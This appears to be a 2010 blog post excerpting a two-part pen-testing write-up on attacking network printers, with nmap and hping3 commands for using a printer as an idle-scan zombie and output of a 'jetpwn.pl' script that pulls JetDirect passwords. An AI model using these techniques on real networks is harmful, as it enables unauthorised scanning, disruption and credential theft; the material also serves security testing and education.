Tuesday, June 15, 2010

Fun with printers

PART - I



"I don’t see a whole lot on the forums about owning printers during a pen test, so I figured I’d post some stuff here.

First, printers are often overlooked when it comes to securing a network. Why? Because all they’re supposed to do is print. You plug them in, install a driver, and so long as the end user can print, all is well in the world.

Thanks to this misconception, we can use network printers to gather boat loads of information, as well, as bounce through them when port scanning, cause disruption, and, well, screw with people.

First, printers are PERFECT boxes to use when doing a bounce (aka, IPID, zombie, idle, etc.) scan. Example:

nmap -sS -p9100 10.0.0.* --open
..snip..
Nmap scan report for 10.0.0.23
Host is up (0.00055s latency).
PORT STATE SERVICE
9100/tcp open jetdirect
..snip..


Ok, so we know that .23 is a printer. Yay.. lets see how much activity this thing is seeing at the moment..

hping3 10.0.0.23 -r -p 31337
HPING 10.0.0.23 (eth0 10.0.0.23): NO FLAGS are set, 40 headers + 0 data bytes
len=46 ip=10.0.0.23 ttl=64 id=54757 sport=31337 flags=RA seq=0 win=0 rtt=0.6 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=1 win=0 rtt=0.9 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=2 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=3 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=4 win=0 rtt=0.8 ms


Sweet.. each IP ID is incremented by 1, this indicates that there’s no other traffic on this printer at the moment. We can use this to bounce through when doing a scan against the PDC...."

Read More




PART - II

"Ok, I’ll admit, the last post didn’t have a whole lot to do with printers, but it probably got you interested enough to read part 2.

First, lets find our network printers..

./jetpwn.pl eth0
Using range 10.0.0.1-255

Password for JetDirect running on 10.0.0.22
Hex password: 49 4e 54 45 52 57 45 42 5a
ASCII password: INTERWEBZ

Password for JetDirect running on 10.0.0.23
Hex password: 50 57 4e 5a
ASCII password: PWNZ
Not only did that find the network printers, it also grabbed and converted the password for us. "

Read More
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)